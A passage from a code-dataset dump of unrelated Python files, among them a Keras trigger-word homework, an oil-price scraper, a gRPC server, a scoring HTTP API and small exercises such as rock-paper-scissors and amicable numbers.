in random_indices] # 取出对应的activates\r\n\r\n for activate_index in random_activates:\r\n background,segment_now_index = insert_audio_clip(background,activate_index,previous_segments)\r\n y = insert_ones(y,segment_now_index[1])\r\n\r\n #4. 同理,随机选择0,2个negtive音频,插入background\r\n number_of_positives = np.random.randint(0, 3) # 随机选取个数\r\n random_indices = np.random.randint(len(negatives), size=number_of_positives) # 在指定范围内,随机选取个数个的数字\r\n random_positives = [negatives[i] for i in random_indices] # 取出对应的activates\r\n\r\n for positive_index in random_positives:\r\n background,_ = insert_audio_clip(background,positive_index,previous_segments)\r\n\r\n # 标准化合成完成后的语音\r\n background = match_target_amplitude(background, -20.0)\r\n # file_handle = background.export(\"train\" + \".wav\", format=\"wav\")\r\n # print(\"File (train.wav) was saved in your directory.\")\r\n\r\n return y\r\n\r\n# Test OK!\r\n# y = create_training_example(backgrounds[0], activates, negatives)\r\n# plt.clf()\r\n# plt.plot(y[0])\r\n# plt.show()\r\n\r\n#%% 以上就是完整的数据集处理过程,实际上作业中已经安排好了所有的数据集\r\nx_dev = np.load(r\"C5_W3_HomeWork_Part2_DataSet/XY_dev/X_dev.npy\")\r\ny_dev = np.load(r\"C5_W3_HomeWork_Part2_DataSet/XY_dev/Y_dev.npy\")\r\n\r\nX = np.load(r\"C5_W3_HomeWork_Part2_DataSet/XY_train/X.npy\")\r\nY = np.load(r\"C5_W3_HomeWork_Part2_DataSet/XY_train/Y.npy\")\r\n\r\n# print(x_dev.shape)\r\n# print(y_dev.shape)\r\n\r\n# 使用keras构建模型\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras.models import Model, load_model, Sequential\r\nfrom keras.layers import Dense, Activation, Dropout, Input, Masking, TimeDistributed, LSTM, Conv1D\r\nfrom keras.layers import GRU, Bidirectional, BatchNormalization, Reshape\r\nfrom keras.optimizers import Adam\r\n\r\n# 具体模型参数参看Dataset下的图片Model.png\r\n# (25, 5511, 101)\r\n# (25, 1375, 1)\r\n# 实现model函数\r\n\r\ndef model():\r\n inputs = Input(shape= [Tx,n_freq])\r\n Conv_1D = Conv1D(196,15,strides=4)(inputs)\r\n # print(Conv_1D.shape)\r\n Conv_1D = BatchNormalization()(Conv_1D)\r\n Conv_1D = Activation(activation='relu')(Conv_1D)\r\n Conv_1D = Dropout(0.8)(Conv_1D)\r\n # print(Conv_1D.shape)\r\n # 完成1D卷积之后 shape变更为(batchsize,1375((5511 - kernalsize) / stride + 1),196)\r\n # 将完成卷积的1维序列通过GRU\r\n GRU_Senquence = GRU(128,return_sequences= True)(Conv_1D)\r\n # (batchsize,1375,128)\r\n GRU_Senquence = Dropout(0.8)(GRU_Senquence)\r\n GRU_Senquence = BatchNormalization()(GRU_Senquence)\r\n\r\n #再次通过GRU\r\n GRU_Senquence = GRU(128,return_sequences= True)(GRU_Senquence)\r\n # (batchsize,1375,128)\r\n GRU_Senquence = Dropout(0.8)(GRU_Senquence)\r\n GRU_Senquence = BatchNormalization()(GRU_Senquence)\r\n GRU_Senquence = Dropout(0.8)(GRU_Senquence)\r\n\r\n #通过密集连接层和sigmoid输出\r\n Dense_output = Dense(1,activation='sigmoid')(GRU_Senquence)\r\n # (batchsize,1375,1)\r\n\r\n\r\n model = Model(inputs = inputs,outputs = Dense_output)\r\n return model\r\n\r\nmodel = model()\r\n# x_test = np.ones(shape = [25,Tx,n_freq])\r\n# y_test = model.predict(x_test)\r\n# Test OK!\r\n# model.summary()\r\n\r\n# 开始训练\r\nmodel = load_model(r'C5_W3_HomeWork_Part2_DataSet/models/tr_model.h5')\r\nopt = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, decay=0.01)\r\nmodel.compile(loss='binary_crossentropy', optimizer=opt, metrics=[\"accuracy\"])\r\n\r\n#小试2步 检测准确率\r\nmodel.fit(X, Y, batch_size = 5, epochs=1)\r\n\r\n# loss, acc = model.evaluate(x_dev, y_dev)\r\n# print(\"Dev set accuracy = \", acc)\r\n\r\n# 但是由于模型标签严重向0倾斜,因此准确率在这里虽然高于90,但其实是不准确的,这里应该使用例如F1得分或“精确度/召回率”。\r\n\r\n# 下面对模型进行预测\r\ndef detect_triggerword(filename):\r\n plt.clf()\r\n plt.subplot(2, 1, 1)\r\n\r\n x = graph_spectrogram(filename)\r\n # the spectogram outputs (freqs, Tx) and we want (Tx, freqs) to input into the model\r\n x = x.swapaxes(0, 1)\r\n x = np.expand_dims(x, axis=0)\r\n predictions = model.predict(x)\r\n\r\n plt.subplot(2, 1, 2)\r\n plt.plot(predictions[0, :, 0])\r\n plt.ylabel('probability')\r\n plt.show()\r\n return predictions\r\n\r\n# 一旦估计了在每个输出步骤中检测到\"activate\"一词的可能性,就可以在该可能性高于某个阈值时触发出\"chiming(蜂鸣)\"声。\r\n# 此外,在说出\"activate\"之后,对于许多连续值,可能接近1,但我们只希望发出一次提示音。\r\n# 因此,每75个输出步骤最多将插入一次铃声。���将有助于防止我们为\"activate\"的单个实例插入两个提示音。(\r\n# 该作用类似于计算机视觉中的非极大值抑制)\r\n# 实现chime_on_activate()。你需要执行以下操作:\r\n#\r\n# 1.遍历每个输出步骤的预测概率\r\n# 2.当预测大于阈值并且经过了连续75个以上的时间步长时,在原始音频剪辑中插入\"chime\"\r\n\r\nchime_file = r\"C5_W3_HomeWork_Part2_DataSet/audio_examples/chime.wav\"\r\n\r\n\r\ndef chime_on_activate(filename, predictions, threshold):\r\n audio_clip = AudioSegment.from_wav(filename)\r\n chime = AudioSegment.from_wav(chime_file)\r\n Ty = predictions.shape[1]\r\n # Step 1: Initialize the number of consecutive output steps to 0\r\n consecutive_timesteps = 0\r\n # Step 2: Loop over the output steps in the y\r\n for i in range(Ty):\r\n # Step 3: Increment consecutive output steps\r\n consecutive_timesteps += 1\r\n # Step 4: If prediction is higher than the threshold and more than 75 consecutive output steps have passed\r\n if predictions[0, i, 0] > threshold and consecutive_timesteps > 75:\r\n # Step 5: Superpose audio and background using pydub\r\n audio_clip = audio_clip.overlay(chime, position=((i / Ty) * audio_clip.duration_seconds) * 1000)\r\n # Step 6: Reset consecutive output steps to 0\r\n consecutive_timesteps = 0\r\n\r\n audio_clip.export(r\"C5_W3_HomeWork_Part2_DataSet/output/chime_output_dev2.wav\", format='wav')\r\n\r\n# Test OK!\r\n# filename = r\"C5_W3_HomeWork_Part2_DataSet/raw_data/dev/1.wav\"\r\n# prediction = detect_triggerword(filename)\r\n# chime_on_activate(filename, prediction, 0.5)\r\n\r\n# filename = r\"C5_W3_HomeWork_Part2_DataSet/raw_data/dev/2.wav\"\r\n# prediction = detect_triggerword(filename)\r\n# chime_on_activate(filename, prediction, 0.4)\r\n\r\n","repo_name":"ShinewineW/LearningSmth","sub_path":"WuDeepLearningCourse/C5_W3_HomeWork_Part2.py","file_name":"C5_W3_HomeWork_Part2.py","file_ext":"py","file_size_in_byte":20261,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27579328602","text":"#####################################################################################################\n##\n## Get Data Engine\n##\n## Author: Manilson Antonio Lussati\n## Date: 04/02/2021\n##\n#####################################################################################################\n\nimport time\nimport pandas as pd\nimport requests\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport schedule\n\nURI = 'https://oilprice.com/oil-price-charts/#prices'\n\ndef get_list_from_data(str_data):\n list_str_data = str_data.split('(')\n return list_str_data[0]\n\n\ndef replace_specific(text):\n \n text = text.replace('(2 \\tdays Delay)', '')\n \n return text\n\n \ndef get_df_from_page_html(): \n req = requests.get(URI)\n if req.status_code == 200:\n print('Requisição bem sucedida!')\n content = req.content\n soup = BeautifulSoup(content, 'html.parser')\n table = soup.find_all(\"table\", class_=\"oilprices__table\")\n table_str = str(table)\n df = pd.read_html(table_str)[2]\n df_g = pd.read_html(table_str)[1]\n\n # Juntando os dados\n print('Juntando os dados')\n df_g = df_g[df_g[1].isin(['Girassol SellBuy'])]\n df = df[df[1].isin(['Cabinda SellBuy', 'Nemba SellBuy', 'Dalia SellBuy'])]\n\n df_join = df.append(df_g, ignore_index=True)\n\n print('DATAFRAME G: ', len(df_g))\n print('DATAFRAME : ', len(df))\n print('DATAFRAME JOIN: ', len(df_join))\n try:\n # Fazendo o tratamento dos dados\n df_join.rename(columns = {1:'pocos', 2:'price', 3:'change', 4:'%_change'}, inplace = True)\n df_join['pocos'] = df_join['pocos'].str.replace('SellBuy','')\n df_join['%_change'] = df_join['%_change'].apply(replace_specific)\n df_join.drop([0, 5], axis=1, inplace=True)\n df_join['%_change'] = df_join['%_change'].apply(get_list_from_data)\n df_join['data'] = datetime.today().strftime('%Y-%m-%d')\n df_join.reset_index(drop=True)\n df_join.to_excel('data/price_oil_{}.xlsx'.format(datetime.today().strftime('%Y-%m-%d')), index = False, header=True)\n print(df_join)\n return 'Done'\n except Exception as e:\n print('Alguma coisa deu errado: ', e)\n return e\n \ndef main():\n get_df_from_page_html()\n\nif __name__ == '__main__':\n main()","repo_name":"PalancaData-Community/open-data-web-scrapy","sub_path":"get_file_price_oil.py","file_name":"get_file_price_oil.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39486148175","text":"from route_pb2_grpc import RouteGuideServicer as _RouteGuideService, add_RouteGuideServicer_to_server\nfrom route_pb2 import structured_data\nfrom random import uniform\n\n\nclass RouteGuideServicer(_RouteGuideService):\n def __init__(self):\n super().__init__()\n\n def GetTimings(self, request_iterator, context):\n for iteration in request_iterator:\n print('fucking iteration', iteration)\n yield structured_data(\n service_name='Tester',\n uptime_duration=uniform(1.0, 10000.00),\n request_duration=uniform(1.0, 10000.00)\n )\n\n\nif __name__ == '__main__':\n def _start_server(server, port='[::]:50051'):\n server.add_insecure_port(port)\n print('server started!!!!!')\n server.start()\n server.wait_for_termination()\n\n import grpc\n from concurrent import futures\n _server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))\n add_RouteGuideServicer_to_server(\n RouteGuideServicer(), _server\n )\n _start_server(_server)\n\n\n\n","repo_name":"mahdithejedi/docs","sub_path":"gRPC/GoogleRouteExample/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27963643423","text":"import os\nimport openai\n\nwith open('/Users/marc/coding/projects/api/chatgpt/key.txt', 'r') as file:\n data = file.read().replace('\\n', '')\n\nopenai.api_key = data\n\n\nprompt1 = \"Who are the top 20 female athletes of all time?\"\ncompletion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"user\", \"content\": input(\"You: \")}\n ]\n)\n\nprint(completion.choices[0].message.content)\n","repo_name":"marc-maurice/portfolio","sub_path":"chatgpt/chatgpt_single_question.py","file_name":"chatgpt_single_question.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5630249392","text":"import json\nimport torch\nfrom fairseq.models.roberta import RobertaModel\nfrom examples.roberta import qnli_ranking # load the Pairwise Ranking QNLI task\nimport argparse\nfrom collections import OrderedDict\nimport os\nimport pdb\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--model-path\", default=\"/scratch0/roberta-chks/freeadv-qnliranking-iters33112-warmup1986-lr1e-05-bsize1-freq16-advlr5e-2-advstep2-initmag1e-2-fp32-seed9017-beta0.999\", type=str)\nparser.add_argument(\"--chk-name\", default=\"checkpoint_best.pt\", type=str)\nparser.add_argument(\"--out-path\", default=\"QNLI-ranking-res\", type=str)\nparser.add_argument(\"--test-fname\", default=\"test.jsonl\", type=str)\nparser.add_argument(\"--num\", default=0, type=int)\nparser.add_argument(\"--gpu\", default=\"0\", type=str)\nargs = parser.parse_args()\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.gpu\n\nroberta = RobertaModel.from_pretrained(args.model_path, args.chk_name, 'QNLI-pair-bin')\nroberta.eval() # disable dropout\nroberta.cuda() # use the GPU (optional)\nnsamples, ncorrect = 0, 0\nres_dict = OrderedDict()\nscores_list = []\nwith open(os.path.join('QNLI-pair-bin', args.test_fname)) as h:\n with torch.no_grad():\n for line in h:\n example = json.loads(line)\n if example['sent1'] == None:\n res_dict[example['idxes'][0]] = 'entailment' # write entailment for lonely senteneces\n ncorrect += 1\n pdb.set_trace()\n else:\n scores = []\n choices = [example['sent0'], example['sent1']]\n for choice in choices:\n input = roberta.encode(\n 'Q: ' + example['ques'],\n 'A: ' + choice,\n no_separator=True\n )\n score = roberta.predict('sentence_classification_head', input, return_logits=True)\n scores.append(score)\n\n scores_list.append({'idxes': example['idxes'], 'scores': scores})\n\n if scores[0] > scores[1]:\n reses = ['entailment', 'not_entailment']\n if 'label' in example:\n ncorrect += example['label'] == 0\n else:\n reses = ['not_entailment', 'entailment']\n if 'label' in example:\n ncorrect += example['label'] == 1\n for idx, res in zip(example['idxes'], reses):\n res_dict[idx] = res\n nsamples += 2\n\nif not os.path.exists(args.out_path):\n os.makedirs(args.out_path)\nfs = open(os.path.join(args.out_path, \"QNLI.tsv\"), \"w+\")\nfs.write(\"id\\tlabel\\n\")\nint_keys = [int(k) for k in res_dict.keys()]\nsorted_keys = sorted(int_keys)\nfor key in sorted_keys:\n if key == -1:\n # these are auxiliary keys\n continue\n fs.write(\"%s\\t%s\\n\"%(str(key), res_dict[str(key)]))\n\nfs.close()\n\ntorch.save({\"model\": args.model_path, \"scores_list\": scores_list}, os.path.join(args.out_path, \"scores\", \"QNLI_%d.pt\"%args.num))\n\nprint(\"Accuracy: {}\".format(float(ncorrect*2)/nsamples))\nprint(\"Done.\")","repo_name":"zhuchen03/FreeLB","sub_path":"fairseq-RoBERTa/examples/roberta/qnli_ranking/gen_test_res.py","file_name":"gen_test_res.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"53"} +{"seq_id":"17935288555","text":"import math\n\ndef get_factores(number):\n divisors = [1]\n for i in range(2,math.isqrt(number) + 1):\n if number % i == 0:\n divisors.append(i)\n q = number // i\n if q !=i:\n divisors.append(q)\n return divisors\n\ndef is_amicable(number):\n sum_divisors_own_a = sum(get_factores(number))\n sum_divisors_own_b = sum(get_factores(sum_divisors_own_a))\n if number == sum_divisors_own_b and sum_divisors_own_a!=sum_divisors_own_b:\n return True\n else:\n return False\n\ndef main(MAX):\n numbers_amicables = []\n for number in range(1,MAX):\n if is_amicable(number):\n numbers_amicables.append(number)\n suma_amicables = sum(numbers_amicables)\n print(\"La suma de todos los numeros amigables menores a {} es:{}\".format(MAX,suma_amicables))\n\nmain(10000)\n\n","repo_name":"elterribleabuelo/Project-Euler","sub_path":"problem021.py","file_name":"problem021.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40248362314","text":"#!/usr/bin/env python3\n\"\"\"\nset_station.py\n\nPurpose: Allows changes to a station, such as speed restrictions and availability\n\nAuthor: Cody Jackson\n\nDate: 2/5/19\n################################\nVersion 0.1\n Initial build\n\"\"\"\n\nimport argparse\n\nimport sys\nsys.path.extend([\"/home/cody/PycharmProjects/Transportation_model\"])\n\nfrom archive.database import Base, StationStatus\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef arg_parser():\n \"\"\"Capture transportation orders from user.\"\"\"\n parser = argparse.ArgumentParser(description=\"Update train station status.\")\n parser.add_argument(\"db_location\", help=\"Path of database to use.\")\n parser.add_argument(\"station\", help=\"Station identification. Options: 'Station 1', 'Station 2', 'Station 3, \"\n \"'Station 4'\")\n parser.add_argument(\"--status\", default=True, type=bool, help=\"Station status. Operational = True; Closed = False\")\n parser.add_argument(\"--speed\", default=10, type=str, help=\"Speed limit for the station. Default = 10\")\n parser.add_argument(\"--empty\", default=True, type=bool, help=\"Station available for train. \"\n \"Station available = True; Occupied = False\")\n var_args = vars(parser.parse_args())\n\n return var_args\n\n\ndef access_db(path):\n \"\"\"Establish connection to created database.\"\"\"\n engine = create_engine(\n \"sqlite:///{}\".format(path)) # Interact w/ DB file\n Base.metadata.bind = engine # Bind engine to Base to access classes\n\n db_session = sessionmaker(bind=engine) # Establish comms with DB\n session = db_session() # Create staging area\n\n return session\n\n\ndef update_station(session, station_id, status=True, speed=10, empty=True):\n \"\"\"Change the status of a station.\"\"\"\n station = session.query(StationStatus).filter(StationStatus.station_id == station_id).one()\n station.station_status = status\n station.speed_restriction = speed\n station.track_status = empty\n\n session.add(station)\n session.commit()\n session.close()\n\n\nif __name__ == \"__main__\":\n user_args = arg_parser()\n db_path = user_args[\"db_location\"]\n station_name = user_args[\"station\"]\n working_status = user_args[\"status\"]\n restrict_speed = user_args[\"speed\"]\n available = user_args[\"empty\"]\n\n db_access = access_db(db_path)\n update_station(db_access, station_name, working_status, restrict_speed, available)\n","repo_name":"crystalattice/Rail_model","sub_path":"archive/set_station.py","file_name":"set_station.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35948155322","text":"import os\ndizin=os.getcwd() #os.getcwd() Fonksiyonu Çalışma Dizininin Yoludur\nprint(dizin)\n\n\ntry:\n os.chdir(\"C:\\\\test\") #Programın Çalışma Dizini \"C:\\test\" olarak Ayarlanmıştır\n yeni_dizin=os.getcwd()\n print(yeni_dizin)\n\nexcept FileNotFoundError:\n print(\"Böyle Bir Yol Bulunamadı\")\n os.mkdir(\"C:\\\\test\")\n print(\"Oluşturluyor....\")\n \n","repo_name":"C3lalAydin/Python","sub_path":"Örnekler/Sayfa 176-186 Dosya İşlemleri/Örnekler 176-181/Sayfa 179 Çalışma Dizini Değiştirme.py","file_name":"Sayfa 179 Çalışma Dizini Değiştirme.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36413506390","text":"def movingavg(Sample ,window):\r\n\tzmoving=[]\r\n\tmovingvalues=0\r\n\tfor index in range(0,window):\r\n\t\tmovingvalues+=Sample[index]\r\n\tzmoving.append(movingvalues/window)\r\n\t\r\n\tsize=len(Sample)-window+1\r\n\t\r\n\txaxis=[i for i in range(0,len(Sample))]\r\n\r\n\tfor index in range(1,size):\r\n\t\tmovingvalues+=Sample[index+window-1]-Sample[index-1]\r\n\t\tzmoving.append(movingvalues/(window/2 +1))\r\n\tsize=len(Sample)\r\n\tstart=size-window+1\r\n\tfor index in range(start,size):\r\n\t\t\tzmoving.append(Sample[index])\r\n\tplt.plot(xaxis,Sample[0:len(Sample)],'r',zmoving[0:len(Sample)],'b')\r\n\tplt.show()\r\n\t\r\n\r\nplt.figure(1)\r\nplt.plot(xaxis[0:len(Z)],Z[0:len(Z)],'g')\r\nplt.show()\r\nplt.close()\r\n\r\n\r\nprint(len(latitude))\r\nprint(len(Z))\t\r\n\r\n\r\nmovingavg(Z[0:64],4)\r\n","repo_name":"saainithil97/roadsafe","sub_path":"movingaverage.py","file_name":"movingaverage.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21048944657","text":"import random\nimport tkinter as tk\n\n# Define game constants\nOPTIONS = ['rock', 'paper', 'scissors']\nWIN_CONDITIONS = {\n 'rock': 'scissors',\n 'paper': 'rock',\n 'scissors': 'paper'\n}\n\n# Initialize scores\nplayer_score = 0\ncomputer_score = 0\n\n# Create GUI window\nroot = tk.Tk()\nroot.title(\"Rock Paper Scissors\")\n\n# Define score label widgets\nplayer_label = tk.Label(root, text=\"Player: 0\")\nplayer_label.grid(row=0, column=0)\n\ncomputer_label = tk.Label(root, text=\"Computer: 0\")\ncomputer_label.grid(row=1, column=0)\n\nresult_label = tk.Label(root, text=\"\")\nresult_label.grid(row=2, column=0)\n\n# Define button click functions\n\n\ndef play(option):\n global player_score, computer_score\n computer_choice = random.choice(OPTIONS)\n\n if option == computer_choice:\n result_label.config(text=\"Tie game!\")\n elif WIN_CONDITIONS[option] == computer_choice:\n result_label.config(text=\"Player wins!\")\n player_score += 1\n player_label.config(text=\"Player: {}\".format(player_score))\n else:\n result_label.config(text=\"Computer wins!\")\n computer_score += 1\n computer_label.config(text=\"Computer: {}\".format(computer_score))\n\n\n# Define button widgets\nrock_button = tk.Button(root, text=\"Rock\", command=lambda: play('rock'))\nrock_button.grid(row=3, column=0, padx=10, pady=10)\n\npaper_button = tk.Button(root, text=\"Paper\", command=lambda: play('paper'))\npaper_button.grid(row=3, column=1, padx=10, pady=10)\n\nscissors_button = tk.Button(root, text=\"Scissors\",\n command=lambda: play('scissors'))\nscissors_button.grid(row=3, column=2, padx=10, pady=10)\n\n# Start GUI loop\nroot.mainloop()\n","repo_name":"R3DHULK/python-for-gui-gamers","sub_path":"rock-paper-scissor-gui-with-scoreboard.py","file_name":"rock-paper-scissor-gui-with-scoreboard.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27625666437","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport json\nimport logging\nimport hashlib\nimport uuid\nfrom optparse import OptionParser\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom typing import Dict, List, Tuple\n\nfrom req import ClientsInterestsRequest, MethodRequest, OnlineScoreRequest\nfrom scoring import get_score, get_interests\n\nSALT = \"Otus\"\nADMIN_SALT = \"42\"\nOK = 200\nBAD_REQUEST = 400\nFORBIDDEN = 403\nNOT_FOUND = 404\nINVALID_REQUEST = 422\nINTERNAL_ERROR = 500\nERRORS = {\n BAD_REQUEST: \"Bad Request\",\n FORBIDDEN: \"Forbidden\",\n NOT_FOUND: \"Not Found\",\n INVALID_REQUEST: \"Invalid Request\",\n INTERNAL_ERROR: \"Internal Server Error\",\n}\nUNKNOWN = 0\nMALE = 1\nFEMALE = 2\nGENDERS = {\n UNKNOWN: \"unknown\",\n MALE: \"male\",\n FEMALE: \"female\",\n}\n\n\ndef check_auth(request):\n if request.is_admin:\n string_to_hash = datetime.now().strftime(\"%Y%m%d%H\") + ADMIN_SALT\n digest = hashlib.sha512(string_to_hash.encode()).hexdigest()\n else:\n string_to_hash = request.account + request.login + SALT\n digest = hashlib.sha512(string_to_hash.encode()).hexdigest()\n if digest == request.token:\n return True\n return False\n\n\ndef get_valid_request(request_body, request_class):\n request = request_class()\n err_msg = None\n request_params = {\n n: a for n, a in request_class.__dict__.items() if hasattr(a, \"required\")\n }\n for param_name, param in request_params.items():\n try:\n param_value = request_body[param_name]\n except KeyError:\n if param.required:\n request = None\n err_msg = f\"Request does not contain the field '{param_name}'\"\n break\n continue\n try:\n setattr(request, param_name, param_value)\n except TypeError as exception:\n request = None\n err_msg = str(exception)\n break\n\n return err_msg, request\n\n\ndef get_score_response(\n request: MethodRequest\n) -> Tuple[int, Dict[str, int], List[str]]:\n \"\"\"Return info of response to online score request.\"\"\"\n if request.is_admin:\n return OK, {\"score\": 42}, []\n\n err_message, score_req = get_valid_request(\n request.arguments,\n OnlineScoreRequest\n )\n\n if score_req:\n try:\n know_contacts = score_req.phone and score_req.email\n know_full_name = score_req.first_name and score_req.last_name\n know_bio = score_req.gender is not None and score_req.birthday\n correct_req = know_contacts or know_full_name or know_bio\n if not correct_req:\n err_text = 'The request does not contain any of the pairs: '\n pairs = 'phone-email, first_name-last_name, gender-birthday'\n err_message = err_text + pairs\n except AttributeError as exception:\n err_message = str(exception)\n\n response = err_message\n return_code = INVALID_REQUEST\n req_params = {}\n\n if not err_message:\n req_params = {n.lstrip(\"_\"): v for n, v in score_req.__dict__.items()}\n positional_arg_names = [\"phone\", \"email\"]\n args = {n: None for n in positional_arg_names}\n score = get_score(None, **{**args, **req_params})\n response = {\"score\": score}\n return_code = OK\n\n return return_code, response, list(req_params.keys())\n\n\ndef get_client_interests_response(\n request: MethodRequest,\n) -> Tuple[int, Dict[int, List[str]]]:\n \"\"\"Return an error code and a response to client interests request.\"\"\"\n err_message, client_interests_request = get_valid_request(\n request.arguments,\n ClientsInterestsRequest\n )\n response = err_message\n return_code = INVALID_REQUEST\n if not err_message:\n client_ids = client_interests_request.client_ids\n response = {i: get_interests(1, 1) for i in client_ids}\n return_code = OK\n return return_code, response\n\n\ndef method_handler(request, context, store):\n request_body = request.get(\"body\")\n return_code = INVALID_REQUEST\n response = None\n error = None\n if request_body:\n logging.info(\"Successfully get request body.\")\n error, method_request = get_valid_request(request_body, MethodRequest)\n if method_request:\n logging.info(f\"Request is valid (id: {context.get('request_id')}.\")\n successful_auth = check_auth(method_request)\n return_code = FORBIDDEN\n if successful_auth:\n request_method = method_request.method\n if request_method == \"online_score\":\n return_code, response, filled_fields = get_score_response(\n method_request\n )\n if return_code == OK:\n context[\"has\"] = filled_fields\n elif request_method == \"clients_interests\":\n return_code, response = get_client_interests_response(\n method_request\n )\n if return_code == OK:\n context[\"nclients\"] = len(response)\n else:\n err_msg = f\"The invalid request method {request_method}\"\n logging.error(err_msg + str(context))\n return_code = BAD_REQUEST\n\n response = response or error\n return response, return_code\n\n\nclass MainHTTPHandler(BaseHTTPRequestHandler):\n router = {\n \"method\": method_handler\n }\n store = None\n\n def get_request_id(self, headers):\n return headers.get(\"HTTP_X_REQUEST_ID\", uuid.uuid4().hex)\n\n def do_POST(self):\n response, code = {}, OK\n context = {\"request_id\": self.get_request_id(self.headers)}\n logging.info(f'Request handling started. {context}')\n request = None\n try:\n data_string = self.rfile.read(int(self.headers[\"Content-Length\"]))\n request = json.loads(data_string)\n except:\n logging.error(\"Failed to read request body.\")\n code = BAD_REQUEST\n\n if request:\n path = self.path.strip(\"/\")\n logging.info(\"%s: %s %s\" % (self.path, data_string, context[\"request_id\"]))\n if path in self.router:\n try:\n response, code = self.router[path](\n {\"body\": request, \"headers\": self.headers},\n context,\n self.store\n )\n except Exception as e:\n logging.exception(\"Unexpected error: %s\" % e)\n code = INTERNAL_ERROR\n else:\n code = NOT_FOUND\n\n self.send_response(code)\n self.send_header(\"Content-Type\", \"application/json\")\n self.end_headers()\n if code not in ERRORS:\n r = {\"response\": response, \"code\": code}\n else:\n r = {\"error\": response or ERRORS.get(code, \"Unknown Error\"), \"code\": code}\n context.update(r)\n logging.info(context)\n self.wfile.write(json.dumps(r).encode())\n return\n\n\nif __name__ == \"__main__\":\n op = OptionParser()\n op.add_option(\"-p\", \"--port\", action=\"store\", type=int, default=8080)\n op.add_option(\"-l\", \"--log\", action=\"store\", default=None)\n (opts, args) = op.parse_args()\n logging.basicConfig(\n filename=opts.log,\n level=logging.INFO,\n format=\"[%(asctime)s] %(levelname).1s %(message)s\",\n datefmt=\"%Y.%m.%d %H:%M:%S\"\n )\n server = HTTPServer((\"localhost\", opts.port), MainHTTPHandler)\n logging.info(\"Starting server at %s\" % opts.port)\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n pass\n server.server_close()\n","repo_name":"AndreyAD1/scoring","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":7801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73098236327","text":"# ---------- Import ----------\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Main ----------\nINPUT = input().rstrip().split(\"-\")\n\n# Seperate by -, and sum each index\nfor i, v in enumerate(INPUT):\n popleft = v.split(\"+\")\n \n tmp = 0\n for idx in popleft:\n tmp += int(idx)\n \n INPUT[i] = tmp\n \n# Sum all minus index \nsum = INPUT[0] * 2\nfor i in INPUT:\n sum -= i\n \nprint(sum)","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_1541.py","file_name":"acmicpc_1541.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29301977601","text":"def isPrime(a):\n if a==1:\n return False\n for i in range(2,a):\n if a%i==0:\n return False\n return True\n\nfor a in range(1,100):\n if isPrime(a):\n print(a)\n","repo_name":"EmreDogu/programming-fundementals-labs","sub_path":"Python3/isPrimev2.py","file_name":"isPrimev2.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15711027087","text":"\"\"\"\nIdea: Could show the progression to make this an increasingly general tool.\n\nThis script uses the first column in a csv file as a key and the second column as a value.\nRun as \n\n$ python sorted_data.csv\n\"\"\"\n\nimport sys\nimport csv\nimport itertools\n\n\n\n#statistic = max\n\ndef numeric_range(x):\n \"\"\"\n Find the minimum and maximum values that appear in an iterable object x\n\n >>> numeric_range([100, 0, 78])\n {'max': 100, 'min': 0}\n \"\"\"\n i1, i2 = itertools.tee(x)\n result = {}\n result[\"min\"] = min(i1)\n result[\"max\"] = max(i2)\n return result\n\n\n# argparse will let you use named arguments\n#fname = sys.argv[1]\n\nfname = \"sorted_data.csv\"\nf = open(fname)\nreader = csv.reader(f)\nline = next(reader)\ngrouped = itertools.groupby(reader, key = lambda x: x[0])\ng1 = next(grouped)\n\n#list(g1[1])\n\nvalues = (float(x[1]) for x in g1[1])\nnumeric_range(values)\n\n# Iterators maintain state. Once they are exhausted we cannot go back.\n\n# Iterators can be confusing when you don't know what's in them.\n# list will take an iterator as input and materialize it in a list.\n\n# We could get everything as \n# list(g1[1])\n\n# Sometimes we don't want everything, so we can just select the first few elements.\n# In R and bash we used head.\n# For an iterator in Python we can use 